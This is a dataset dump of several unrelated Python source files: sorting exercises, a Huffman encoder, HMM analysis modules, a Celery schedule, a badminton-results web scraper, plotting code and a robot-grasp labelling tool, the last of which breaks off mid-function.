0\n    #permutations\n    p = 0\n    for idx in range(len(myList)):\n        min_idx = idx\n        for ind in range(idx, len(myList)):\n            i += 1\n            if myList[min_idx] > myList[ind]:\n                min_idx = ind\n        #swap two items of the list\n        p+=1 \n        myList[idx] , myList[min_idx] = myList[min_idx], myList[idx]\n    #number of iterations does not depend on the content of the initial vector, but on its length (n) precisely (b)\n    #(n²+n)/2 = 28 iterations (where n is the length of the list) needed to sort this list (c)\n    #13 permutations performed; it depends on the order of the initial list (d), \n    #(n²+n)/2 = 28 comparisons applied (e)\n    #the complexity is O(n²)   \n    return myList, i, p\n\"\"\" \n##testing sort_Selective\n#myList = [10, 15, 7, 1, 3, 3, 9]\nmyList = []\nfor i in range(100):\n    item = alea(100)\n    myList.append(item)\nshuffle(myList)\nprint(myList)\nresults_tuple = sort_Selective(myList)\nprint('Number of iterations is {i}, number of permutations is {p}'.format(i=results_tuple[1], p=results_tuple[2]))\n\n# (g) for n = 50, comparisons = 1275, permutations : varied\n#     for n = 100, comparisons = 5050, permutations : varied\n#     for n = 500, comparisons = 125250, permutations : varied\n\"\"\"\n\n##\n#Illustration of bubble sorting (a)\ndef sort_bubble(myList):\n    #check if the 
inputlist is not empty\n if len(myList) == 0:\n raise ValueError(\"Your list is empty!\")\n #itirations\n i = 0\n #permutation\n p = 0\n #comparison\n c = 0\n is_sorted = False\n #correction to reduce the length of the list for each outer loop\n m=0\n while is_sorted == False:\n i += 1 \n is_sorted = True\n for idx in range(len(myList)-1-m):\n i += 1\n c += 1\n if myList[idx]>myList[idx+1]:\n is_sorted = False\n #swap two items of the list\n p += 1\n myList[idx], myList[idx+1] = myList[idx+1], myList[idx]\n #print(myList, idx, i, c, p)\n m += 1 \n #number of iterations depends on the content of the initial vector, on its length (n) precisely (b)\n #28 iterations needed to sort this list (c)\n #13 of permutations performed it depends on the order of initial list (d), \n #24 comparisons applied (e)\n #the complexity is O(n²) \n return myList, i, p, c \n\n\"\"\"\n##testing sort_bubble\n#myList = [10, 15, 7, 1, 3, 3, 9]\nmyList = []\nfor i in range(100):\n item = alea(1000)\n myList.append(item)\nshuffle(myList)\nresults_tuple = sort_bubble(myList)\nprint(results_tuple[3])\nprint('Number of iterations is {i}, number of permutations is {p}'.format(i=results_tuple[1], p=results_tuple[2]))\n\n# (g) for n = 50, comparisons varied, permutaions : varied, max is n*(n-1)/2= 1225\n# for n = 100, comparisons varied, permutaions : varied, max is n*(n-1)/2 = 4950\n# for n = 500, comparisons varied, permutaions : varied, max is n*(n-1)/2 = 124750\n\"\"\"\n\n\n\n\n\n\n","sub_path":"assignments/Session1/S1_algotools.py","file_name":"S1_algotools.py","file_ext":"py","file_size_in_byte":11003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"140732978","text":"#!/usr/bin/env python\n\nimport sys\n\ndef print_freqs(set): # for debug\n print([x[0] for x in set])\n\n# get the two lowest frequencies from the set\ndef get_huffman_encoding(set):\n while len(set) > 1:\n lowest, scnd_lowest = (float('inf'),), (float('inf'),)\n # get lowest\n for node in set:\n if node[0] < lowest[0]:\n lowest = node\n elif node[0] < scnd_lowest[0]:\n scnd_lowest = node\n new_node = (lowest[0]+scnd_lowest[0], lowest, scnd_lowest)\n new_list = []\n for node in set:\n if node is not lowest and node is not scnd_lowest:\n new_list.append(node)\n new_list.append(new_node)\n set = new_list\n return set\n\ndef main():\n\tset = []\n\tfor line in sys.stdin.readlines():\n\t\tl = line.split()\n\t\t# we want freq to be first and numeric\n\t\tt = (float(l[1]), l[0])\n\t\tset.append(t)\n\tprint(get_huffman_encoding(set))\n\nif __name__ == \"__main__\": main()\n","sub_path":"huff.py","file_name":"huff.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"216429105","text":"#!/usr/bin/env python-2.4.3\n#\n# October 19 2010, Christian E. 
Hopps\n#\n# Copyright (c) 2010 by cisco Systems, Inc.\n# All rights reserved.\n\n# Standard Preamble\nimport pdb, sys, os, time\nos.environ['PY_XRUT_ROOT'] = os.path.dirname(os.path.dirname(os.path.abspath(sys.path[0])))\nsys.path[1:1] = [os.environ.get('PY_XRUT_ROOT') + '/modules']\n\n# Import modules we'll use.\nimport xrut, utng, pre, isis\n\n#\n# Topology common to all demos\n#\n# [ one ] --- net1 --- [ two ]\n#\ntopology = xrut.ng_topology_t( { 'net1': ( 'one', 'two' ) },\n toponame=\"demotopo\" )\none = topology.routers['one']\ntwo = topology.routers['two']\n\n#\n# Define a test suite that causes a core to demonstrate it being found\n#\nclass code_cov_suite (utng.test_suite_t):\n gcov_components = [ \"clns/isis\" ]\n gcov_processes = [ \"isis_show\" ]\n\n def test_000_config_isis (self):\n topology.config_topology( {\n 'all-iox': \"\"\"\n router isis ring\n net ${self.net}\n ${self.generate_interface_config(\"address-family ipv4 unicast\")}\n \"\"\"\n })\n preq = pre.prerequisite_t(isis.adjacency_up_pred_t(one, two, one.netifs['net1']), 60)\n preq.assert_test_case()\n\n one.send_command(\"show isis database summary\")\n\n# Execute the test suite.\ntopology.execute_test(code_cov_suite())\n","sub_path":"X-COPY/infra/test/xrut/examples/demo/demo-code-cov.py","file_name":"demo-code-cov.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"636268825","text":"import hmm_decoding_module\nimport hmm_changepoints_module\nimport hmm_outputs_module\nimport hmm_simulation_module\nimport hmm_forward_backwards_module\nimport hmm_BaumWelch_module\nimport numpy as np\n\ndef baum_welch_plus_analysis(smoothers, viterbi, time, data, max_num_bins_composite_bead, max_iterations, concentration, bin_width,\n fraction_of_photons_for_subset, arrayPi, arrayMeanCounts, matrixA, row, final_info_array,\n array_of_composite_bead_arrays, n, max_n, num_for_bead_geometric, max_num_for_bead_geometric, arrayPi_arraytosave, arrayMeanCounts_arraytosave, matrixA_arraytosave):\n print(\"row0 \", row)\n final_info_array, array_of_composite_bead_arrays, row, arrayPi_alliters, arrayMeanCounts_alliters, matrixA_alliters, loglikelihood_alliters = hmm_BaumWelch_module.with_decoding(\n smoothers, viterbi, time, data, max_num_bins_composite_bead, max_iterations, concentration, bin_width,\n fraction_of_photons_for_subset, arrayPi, arrayMeanCounts, matrixA, row, final_info_array,\n array_of_composite_bead_arrays, n, max_n, num_for_bead_geometric)\n matrixA_arraytosave, arrayMeanCounts_arraytosave, arrayPi_arraytosave = hmm_outputs_module.add_hmm_inputs_to_array(\n row, arrayPi_arraytosave, arrayMeanCounts_arraytosave, matrixA_arraytosave, arrayPi_alliters,\n arrayMeanCounts_alliters, matrixA_alliters, num_for_bead_geometric, max_num_for_bead_geometric)\n print(\"row1 \", row)\n\n return arrayPi_alliters, arrayMeanCounts_alliters, matrixA_alliters, loglikelihood_alliters, final_info_array, array_of_composite_bead_arrays, row, arrayPi_arraytosave, arrayMeanCounts_arraytosave, matrixA_arraytosave\n\n\ndef decode_changepoints_compositebead_statistics_savingarrays(smoothers, viterbi, n, forward_likelihood, backwards_likelihood, time, data, max_num_bins_bead, background_mean_counts, row, final_info_array, array_of_composite_bead_arrays, bin_width, concentration, fraction_of_photons_for_subset, loglikelihood, matrixA, arrayMeanCounts, arrayPi, num_iterations, max_iterations, num_for_bead_geometric):\n print(\"Decode, Changepoints, Composite 
Bead, Statistics, Add to Arrays\")\n if smoothers == 1:\n decoded = hmm_decoding_module.by_smoothers(n, forward_likelihood, backwards_likelihood)\n row, final_info_array, array_of_composite_bead_arrays = changepoints_compositebead_statistics_savingarrays(1, 0, decoded, time, data, max_num_bins_bead,\n background_mean_counts, row, final_info_array,\n array_of_composite_bead_arrays, bin_width, concentration,\n fraction_of_photons_for_subset, loglikelihood, matrixA, arrayMeanCounts,\n num_iterations, max_iterations, num_for_bead_geometric)\n\n if viterbi == 1:\n decoded = hmm_decoding_module.by_viterbi(data, matrixA, arrayMeanCounts, arrayPi)\n row, final_info_array, array_of_composite_bead_arrays = changepoints_compositebead_statistics_savingarrays(0, 1, decoded, time, data, max_num_bins_bead,\n background_mean_counts, row, final_info_array,\n array_of_composite_bead_arrays, bin_width, concentration,\n fraction_of_photons_for_subset, loglikelihood, matrixA, arrayMeanCounts,\n num_iterations, max_iterations, num_for_bead_geometric)\n\n return row, final_info_array, array_of_composite_bead_arrays\n\ndef changepoints_compositebead_statistics_savingarrays(smoothers, viterbi, decoded, time, data, max_num_bins_bead, background_mean_counts, row, final_info_array, array_of_composite_bead_arrays, bin_width, concentration, num_photons_subset, loglikelihood, matrixA, arrayMeanCounts, num_iterations, max_iterations, num_for_bead_geometric):\n changepoint_index = hmm_changepoints_module.get_changepoint_time_index_direction(decoded, time)\n all_beads_plus_dwell, composite_bead_array, num_beads_array = hmm_outputs_module.composite_bead(data,\n max_num_bins_bead,\n background_mean_counts,\n changepoint_index,\n num_iterations,\n num_for_bead_geometric)\n stats_all_transitions = hmm_outputs_module.statistics_all_transitions(changepoint_index, bin_width)\n row, final_info_array, array_of_composite_bead_arrays = hmm_outputs_module.add_to_holding_arrays(smoothers, viterbi, row,\n final_info_array,\n array_of_composite_bead_arrays,\n stats_all_transitions,\n bin_width,\n concentration,\n num_photons_subset,\n loglikelihood,\n matrixA,\n arrayMeanCounts,\n num_beads_array,\n num_iterations,\n max_iterations,\n num_for_bead_geometric,\n composite_bead_array)\n\n return row, final_info_array, array_of_composite_bead_arrays\n\ndef find_beads_detected_in_background_simulation(num_data_points, bin_width, row_b, arrayPi_alliters, arrayMeanCounts_alliters, matrixA_alliters, smoothers, viterbi, n, max_num_bins_bead, final_info_array, array_of_composite_bead_arrays, num_for_bead_geometric, concentration, fraction_of_photons_for_subset, max_iterations):\n print(\"Find Beads Detected in Background Simulation\")\n total_iterations = len(arrayMeanCounts_alliters)\n for i in range(total_iterations):\n arrayPi = arrayPi_alliters[i]\n arrayMeanCounts = arrayMeanCounts_alliters[i]\n matrixA = matrixA_alliters[i]\n\n num_iterations = i + 1\n\n time, background = hmm_simulation_module.simulate_background(arrayMeanCounts[0], num_data_points, bin_width)\n\n forward_likelihood, backwards_likelihood, loglikelihood = hmm_forward_backwards_module.run_algorithms_scaled_for_numba(len(arrayMeanCounts), len(background), background, arrayPi, matrixA, arrayMeanCounts)\n\n row_b, final_info_array, array_of_composite_bead_arrays = decode_changepoints_compositebead_statistics_savingarrays(smoothers, viterbi, n, forward_likelihood,\n backwards_likelihood, time, background, max_num_bins_bead,\n arrayMeanCounts[0], row_b, final_info_array,\n 
array_of_composite_bead_arrays, bin_width,\n concentration, fraction_of_photons_for_subset, loglikelihood,\n matrixA, arrayMeanCounts, arrayPi,\n num_iterations, max_iterations,\n num_for_bead_geometric)\n\n return final_info_array, array_of_composite_bead_arrays, background, row_b\n\ndef get_composite_bead_from_simulation(row, array_of_composite_bead_arrays_sim, array_of_num_beads_array, matrixA, arrayMeanCounts, time, num_for_bead_geometric, max_num_bins_bead):\n print(\"Composite Bead from Simulation\")\n total_iterations = len(arrayMeanCounts)\n for i in range(total_iterations):\n num_iterations = i + 1\n row1 = int(row/2) - total_iterations + i\n state, data = hmm_simulation_module.simulation(matrixA[i], arrayMeanCounts[i], len(time))\n changepoint_index = hmm_changepoints_module.get_changepoint_time_index_direction(state, time)\n all_beads_plus_dwell, composite_bead_array, num_beads_array = hmm_outputs_module.composite_bead(data, max_num_bins_bead, arrayMeanCounts[i, 0], changepoint_index, num_iterations, num_for_bead_geometric)\n array_of_composite_bead_arrays_sim = hmm_outputs_module.add_composite_bead_to_array(0, 0, row1, array_of_composite_bead_arrays_sim, composite_bead_array)\n num_beads_array = np.append(num_beads_array, np.array([num_iterations, num_for_bead_geometric]))\n array_of_num_beads_array[row1, :] = num_beads_array\n\n return array_of_num_beads_array, array_of_composite_bead_arrays_sim, data\n","sub_path":"hmm_analysis_module.py","file_name":"hmm_analysis_module.py","file_ext":"py","file_size_in_byte":10001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"382208929","text":"from __future__ import absolute_import, unicode_literals\nimport os\nfrom celery import Celery\nfrom celery.schedules import crontab\n\n# set the default Django settings module for the 'celery' program. 
Should be the same as in wsgi.py\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dj_time_tasks.settings')\n\napp = Celery('proj')\n\n# Using a string here means the worker don't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n# Load task modules from all registered Django app configs.\napp.autodiscover_tasks()\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request))\n\n\napp.conf.beat_schedule = {\n 'every-minute': {\n 'task': 'rand_quote',\n 'schedule': crontab()\n # 'args': (16, 16),\n },\n 'every-5-seconds': {\n 'task': 'multiply_two_numbers',\n 'schedule': 5.0,\n 'args': (16, 16)\n },\n 'delete-every-5-seconds': {\n 'task': 'delete_invoice',\n 'schedule': 5.0,\n },\n # 'add-every-3-seconds': {\n # 'task': 'tasks.add',\n # 'schedule': 3.0,\n # 'args': (16, 16)\n # },\n}","sub_path":"dj_time_tasks/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"646722974","text":"\n\nfrom xai.brain.wordbase.verbs._transmit import _TRANSMIT\n\n#calss header\nclass _TRANSMITS(_TRANSMIT, ):\n\tdef __init__(self,): \n\t\t_TRANSMIT.__init__(self)\n\t\tself.name = \"TRANSMITS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"transmit\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_transmits.py","file_name":"_transmits.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"580938434","text":"import os\nfrom plotnine import ggplot, aes, geom_boxplot, labs, theme, element_text, facet_wrap, facet_grid, geom_violin, ggtitle\nfrom plotnine.themes.elements import Margin\n\nfrom config import Config\nimport pandas as pd\nfrom projects import ProjectName\n\nprojects = list(map(lambda x: x.github(), list(ProjectName)))\nworking_projects = dict()\nfor project in projects:\n try:\n designite_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"designite\", project, \"scores.csv\"))\n designite_scores_df = pd.read_csv(designite_scores_path)\n designite_scores_df['dataset'] = 'Designite'\n designite_scores_df['project'] = project\n\n fowler_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"fowler\", project, \"scores.csv\"))\n fowler_scores_df = pd.read_csv(fowler_scores_path)\n fowler_scores_df['dataset'] = 'Fowler'\n fowler_scores_df['project'] = project\n\n # traditional_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"traditional\", project, \"scores.csv\"))\n # traditional_scores_df = pd.read_csv(traditional_scores_path)\n # traditional_scores_df['dataset'] = 'Traditional'\n # traditional_scores_df['project'] = project\n\n traditional_fowler_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"fowler_traditional\", project, \"scores.csv\"))\n traditional_fowler_scores_df = pd.read_csv(traditional_fowler_scores_path)\n traditional_fowler_scores_df['dataset'] = 'Traditional +\\n Fowler'\n traditional_fowler_scores_df['project'] = project\n\n # traditional_designite_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"traditional_designite\", project, \"scores.csv\"))\n # traditional_designite_scores_df = 
pd.read_csv(traditional_designite_scores_path)\n # traditional_designite_scores_df['dataset'] = 'Traditional +\\n Designite'\n # traditional_designite_scores_df['project'] = project\n\n designite_fowler_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"designite_fowler\", project, \"scores.csv\"))\n designite_fowler_scores_df = pd.read_csv(designite_fowler_scores_path )\n designite_fowler_scores_df['dataset'] = 'Designite +\\n Fowler'\n designite_fowler_scores_df['project'] = project\n\n traditional_designite_fowler_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"designite_fowler_traditional\", project, \"scores.csv\"))\n traditional_designite_fowler_scores_df = pd.read_csv(traditional_designite_fowler_path)\n traditional_designite_fowler_scores_df['dataset'] = 'Traditional +\\n Designite +\\n Fowler'\n traditional_designite_fowler_scores_df['project'] = project\n\n datasets = [\n designite_scores_df,\n fowler_scores_df,\n # traditional_scores_df,\n traditional_fowler_scores_df,\n # traditional_designite_scores_df,\n designite_fowler_scores_df,\n traditional_designite_fowler_scores_df\n ]\n\n scores_df = pd.concat(datasets, ignore_index=True)\n working_projects[project] = scores_df\n except Exception:\n continue\n\nscore_types = [\"precision\", \"recall\", \"f1-measure\", \"auc-roc\", \"brier score\"]\nfeatures_methods = [\"all\", \"chi2_20p\", \"chi2_50p\", \"f_classif_20\", \"f_classif_50\", \"mutual_info_classif_20p\", \"mutual_info_classif_50p\", \"recursive_elimination\", \"mutual_info_classif_50p\", \"recursive_elimination\"]\ncalculations = [\"mean\", \"max\"]\n\nfor score_type in score_types:\n for features_method in features_methods:\n for calculation in calculations:\n scores_df = pd.concat(list(map(lambda x: x.drop(['estimator', 'configuration'], axis=1)\n .groupby(['dataset', 'feature_selection'])\n .aggregate({score_type: calculation})\n .reset_index(), working_projects.values())))\n scores = scores_df.loc[scores_df['feature_selection'] == features_method]\n\n g = (ggplot(scores,\n aes(x='dataset',\n y=score_type))\n + geom_violin()\n + geom_boxplot(width=0.2)\n + labs(title=\"{0} Score with features from {1}\".format(score_type.capitalize(), features_method.capitalize()),\n x=\"Score Measure: {}\".format(score_type.capitalize()),\n y=\"Feature Selection Method: {}\".format(features_method.capitalize()))\n + theme(\n plot_title=element_text(size=30, lineheight=.8, vjust=1,\n family=\"Fira Code\", face=\"bold\", margin={'b': 25}),\n axis_text_x=element_text(size=15, family=\"Fira Code\"),\n axis_text_y=element_text(size=15, family=\"Fira Code\"),\n axis_title_x=element_text(size=20, family=\"Fira Code\"),\n axis_title_y=element_text(size=20, family=\"Fira Code\")\n )\n )\n pdf_dir = Config.get_work_dir_path(os.path.join(\"paper\", \"graphics\", \"ggplot\", \"images\", \"pdf\"))\n png_dir = Config.get_work_dir_path(os.path.join(\"paper\", \"graphics\", \"ggplot\", \"images\", \"png\"))\n csv_dir = Config.get_work_dir_path(os.path.join(\"paper\", \"graphics\", \"ggplot\", \"images\", \"csv\"))\n Config.assert_dir_exists(pdf_dir)\n Config.assert_dir_exists(png_dir)\n Config.assert_dir_exists(csv_dir)\n formatted_score_type = score_type.replace(\" \", \"_\")\n formatted_score_type = formatted_score_type.replace(\" \", \"_\")\n pdf_path = os.path.join(pdf_dir, \"{0}_{1}_{2}\".format(formatted_score_type, features_method, calculation))\n png_path = os.path.join(png_dir, \"{0}_{1}_{2}\".format(formatted_score_type, features_method, 
calculation))\n csv_path = os.path.join(csv_dir, \"{0}_{1}_{2}\".format(formatted_score_type, features_method, calculation))\n g.save(pdf_path, width=50, height=28.12, units=\"cm\")\n g.save(png_path, width=50, height=28.12, units=\"cm\")\n scores_df.to_csv(csv_path, index=False)\n","sub_path":"paper/graphics/ggplot/create_graphs.py","file_name":"create_graphs.py","file_ext":"py","file_size_in_byte":6304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"358798848","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport re\n\ndef get_soup(url_link):\n req = Request(url_link, headers={'User-Agent': 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n soup_html = BeautifulSoup(webpage, 'html.parser') \n return soup_html\n\ndef game_score_array_single(game_score, match_soup):\n # Player 1 id\n p1_chunk = match_soup.findAll('div', {'class':'player1-name'})\n if len(p1_chunk)==1:\n url_p1 = re.search('href=\"(.*)\">', str(p1_chunk)).group(1)\n p1_split = url_p1.split('/')\n p1_pid = p1_split[4]\n else:\n p1_pid=''\n\n # Player 2 id\n p2_chunk = match_soup.findAll('div', {'class':'player2-name'})\n if len(p2_chunk)==1:\n url_p2 = re.search('href=\"(.*)\">', str(p2_chunk)).group(1)\n p2_split = url_p2.split('/')\n p2_pid = p2_split[4]\n else:\n p2_pid=''\n \n game_det = match_soup.findAll('div', {'class':'game-completed-wrap'}) \n games_played = len(game_det)\n for c, games in enumerate(game_det, 1):\n games_split = games.find_all('div')\n p1_score = games_split[2].text\n p1_score = p1_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n p2_score = games_split[4].text\n p2_score = p2_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n scores = {\n 't_id': tourney_id,\n 't_date': tourney_date,\n 'games_played': games_played,\n 'p1a_pid': p1_pid,\n 'p1b_pid': '',\n 'p2a_pid': p2_pid,\n 'p2b_pid': '',\n 'game': c,\n 'p1_score': p1_score,\n 'p2_score': p2_score}\n game_score.append(scores) \n return game_score\n\ndef game_score_array_double(game_score, match_soup):\n \n # Player 1 id \n p1_chunk = match_soup.findAll('div', {'class':'player1-name'}) \n if len(p1_chunk)==2: \n url_p1a = re.findall('href=\"(.*)\">', str(p1_chunk))[0]\n url_p1b = re.findall('href=\"(.*)\">', str(p1_chunk))[1] \n p1_split = url_p1a.split('/')\n p1a_pid = p1_split[4] \n p1_split = url_p1b.split('/')\n p1b_pid = p1_split[4]\n else:\n p1a_pid=''\n p1b_pid=''\n\n # Player 1 id \n p2_chunk = match_soup.findAll('div', {'class':'player2-name'}) \n if len(p2_chunk)==2: \n url_p2a = re.findall('href=\"(.*)\">', str(p2_chunk))[0]\n url_p2b = re.findall('href=\"(.*)\">', str(p2_chunk))[1] \n p2_split = url_p2a.split('/')\n p2a_pid = p2_split[4] \n p2_split = url_p2b.split('/')\n p2b_pid = p2_split[4]\n else:\n p2a_pid=''\n p2b_pid=''\n \n game_det = match_soup.findAll('div', {'class':'game-completed-wrap'}) \n games_played = len(game_det)\n for c, games in enumerate(game_det, 1):\n games_split = games.find_all('div')\n p1_score = games_split[2].text\n p1_score = p1_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n p2_score = games_split[4].text\n p2_score = p2_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n scores = {\n 't_id': tourney_id,\n 't_date': tourney_date,\n 'games_played': games_played,\n 'p1a_pid': p1a_pid,\n 'p1b_pid': p1b_pid,\n 'p2a_pid': p2a_pid,\n 'p2b_pid': p2b_pid,\n 'game': c,\n 'p1_score': p1_score,\n 'p2_score': p2_score}\n game_score.append(scores) \n return game_score\n\n# Load tourney 
list\ntourney_list = pd.read_csv('../../data/01_raw/tournament_year.csv', sep=\"|\")\n\nt_step = 1947\nurl_hit = 'https://bwfbadminton.com/results/1947/china-masters-gpg-2014/2014-04-17'\ni = 2\n\n#for t_step in range(47, len(tourney_list)):\nfor t_step in (range(734,47,-1)):\n game_score = []\n print(\"Tourney \" + str(t_step+1) + \" of \" + str(len(tourney_list)))\n url_hit = tourney_list['t_web_link'][t_step]\n print(url_hit)\n if url_hit != 'none': \n url_split = url_hit.split('/')\n tourney_id = url_split[4]\n \n # Hit podium page of tourney \n soup_html = get_soup(url_hit+'podium')\n ajax_table = soup_html.findAll('div', attrs={'class':'wrapper-content-results'}) \n ajax_el = ajax_table[0].findAll('ul', attrs={'class':'content-tabs'}) \n href_split = ajax_el[0].findAll('a', href=True)\n \n # All tournament days\n for i in range(1,len(href_split)-1):\n print(\"Day \" + str(i) + \" of \" + str(len(href_split)))\n get_id = str(href_split[i])\n # Url page of day i-th of tourney\n url_day = re.search('href=\"(.*)\">', get_id).group(1)\n day_soup = get_soup(url_day)\n game_table = day_soup.findAll('ul', attrs={'class':'list-sort-time'}) \n if len(game_table) != 0:\n game_table_split = game_table[0].find_all('li')\n \n game_count=1\n for get_game_details in range(1, len(game_table_split), 2):\n print(\"Game \" + str(game_count) + \" of \" + str(len(game_table_split)/2))\n game_count+=1\n get_id = str(game_table_split[get_game_details])\n if re.search('href=\"(.*)\">', get_id) is not None: \n url_match = re.search('href=\"(.*)\" id', get_id).group(1)\n url_match = url_match.replace(\"&\", \"&\") \n match_soup = get_soup(url_match)\n \n get_date = url_match.split('/')\n tourney_date = get_date[6]\n \n check_match_type = match_soup.findAll('div', {'class':'player1-name'})\n \n if len(check_match_type) == 2:\n match_type='doubles'\n game_score = game_score_array_double(game_score, match_soup)\n else:\n match_type='singles'\n game_score = game_score_array_single(game_score, match_soup) \n\n tourney_scores_df = pd.DataFrame(game_score) \n filename = \"../../data/01_raw/tourney_details_{}.csv\".format(tourney_id)\n tourney_scores_df.to_csv(filename, index=False, sep='|', header=True)","sub_path":"munge/01_raw/06_tourney_details.py","file_name":"06_tourney_details.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"522607640","text":"import os\nimport cv2\nimport numpy as np\nimport random\nfrom vgt2 import find_contact_region, get_outline_and_normal\nfrom visulize_trajectory import plot_grasp_path\n\n\ndef get_object_pixels(mask_img):\n object_pixels = []\n r, c = mask_img.shape\n for i in range(r):\n for j in range(c):\n if mask_img[i, j] == 1:\n object_pixels.append([i, j])\n return object_pixels\n\n\ndef grasp_features(contact_region, outline_pixels, normals, gripper_center, theta): # gripper_center(row,col)\n \"\"\"\n\n :param contact_region: nx[row,col,side]\n :param outline_pixels:\n :param normals: nx[row0,col0,row1,col1]\n :param gripper_center: [row,col]\n :param theta: gripper roll\n :return: x_loss, y_loss, theta_loss\n \"\"\"\n normal_sum = np.array([0.0, 0.0])\n vector_sum = np.array([0.0, 0.0])\n left_sum = np.array([0.0, 0.0])\n right_sum = np.array([0.0, 0.0])\n gripper_center = np.array(gripper_center)\n if contact_region.shape[0] > 60:\n for contact_marker in contact_region:\n contact = outline_pixels[contact_marker[0]]\n vector_sum += contact - gripper_center # [row, col]\n 
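# running sums over all contact pixels: vector_sum tracks how far the contact centroid\n            # drifts from the gripper centre (reported as x_loss below), while the contact normals in\n            # normal_sum should nearly cancel for a balanced grasp (their magnitude is y_loss)\n            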
normal_sum += normals[contact_marker[0]]\n if contact_marker[1] == 0:\n # left side\n left_sum += normals[contact_marker[0]] # [row, col]\n else:\n # right side\n right_sum += normals[contact_marker[0]] # [row, col]\n x_loss = (vector_sum[0] ** 2 + vector_sum[1] ** 2)**0.5\n y_loss = (normal_sum[0] ** 2 + normal_sum[1] ** 2)**0.5\n r_normal = np.array([np.sin(np.deg2rad(theta)), np.cos(np.deg2rad(theta))]) # [row, col]\n l_normal = np.array([-np.sin(np.deg2rad(theta)), -np.cos(np.deg2rad(theta))]) # [row, col]\n if left_sum.all() == 0:\n alpha = 180\n beta = 180\n elif right_sum.all() == 0:\n beta = 180\n alpha = 180\n else:\n c_alpha = np.dot(l_normal, left_sum) / (left_sum[0]**2+left_sum[1]**2)**0.5\n c_beta = np.dot(r_normal, right_sum) / (right_sum[0]**2 + right_sum[1]**2)**0.5\n alpha = np.rad2deg(np.arccos(c_alpha))\n beta = np.rad2deg(np.arccos(c_beta))\n theta_loss = alpha + beta\n return x_loss, y_loss, theta_loss\n else:\n return -1, -1, -1\n\n\ndef gather_data(mask_img, obj_pt, center_id, grasp_angles):\n outline_pixels, outline_normals, index_array = get_outline_and_normal(mask_img[:, :, 0], 0, 0, 7)\n results = np.ndarray((0, 7), dtype=np.float16)\n # interrupted = False\n for i in center_id:\n # if interrupted:\n # break\n for a in grasp_angles:\n # x = input('press q to quit...')\n # if x == 'q':\n # interrupted = True\n # break\n contact = find_contact_region(outline_pixels, index_array, obj_pt[i], a)\n l1, l2, l3 = grasp_features(contact, outline_pixels, outline_normals, obj_pt[i], a)\n data = [0, obj_pt[i][0], obj_pt[i][1], a, l1, l2, l3] # current grasp data\n if results.size == 0:\n new_results = np.append(results, [data], axis=0)\n # add first one\n else:\n left = 0\n right = len(results) - 1\n\n ci = results[left]\n img1 = np.copy(mask_img*255)\n img2 = np.copy(mask_img*255)\n plot_grasp_path(obj_pt[i], a, 19, 130, img1)\n plot_grasp_path([int(round(ci[1])), int(round(ci[2]))], ci[3], 19, 130, img2)\n img3 = cv2.hconcat([img1, img2])\n img3_s = cv2.resize(img3, (1280, 400))\n cv2.imshow('choose the better grasp', img3_s)\n print(f'compare with {left}')\n usr_input = cv2.waitKeyEx(0)\n cv2.destroyAllWindows()\n if usr_input == 2424832:\n # case 3\n print('left side is better')\n cv2.destroyAllWindows()\n ci = results[right]\n img1 = np.copy(mask_img*255)\n img2 = np.copy(mask_img*255)\n plot_grasp_path(obj_pt[i], a, 19, 130, img1)\n plot_grasp_path([int(round(ci[1])), int(round(ci[2]))], ci[3], 19, 130, img2)\n img3 = cv2.hconcat([img1, img2])\n img3_s = cv2.resize(img3, (1280, 400))\n cv2.imshow('choose the better grasp', img3_s)\n print(f'compare with {right}')\n usr_input = cv2.waitKeyEx(0)\n cv2.destroyAllWindows()\n if usr_input == 2555904:\n # case 31\n print('right side is better')\n while True:\n mid = int((left + right) / 2)\n if mid == left:\n print(f'left {left}, right {right}')\n data[0] = results[right, 0]\n results[right:, 0] += 1\n new_results = np.concatenate([results[:right], [data], results[right:]])\n break\n else:\n ci = results[mid]\n img1 = np.copy(mask_img*255)\n img2 = np.copy(mask_img*255)\n plot_grasp_path(obj_pt[i], a, 19, 130, img1)\n plot_grasp_path([int(round(ci[1])), int(round(ci[2]))], ci[3], 19, 130, img2)\n img3 = cv2.hconcat([img1, img2])\n img3_s = cv2.resize(img3, (1280, 400))\n cv2.imshow('choose the better grasp', img3_s)\n print(f'compare with {mid}')\n usr_input = cv2.waitKeyEx(0)\n 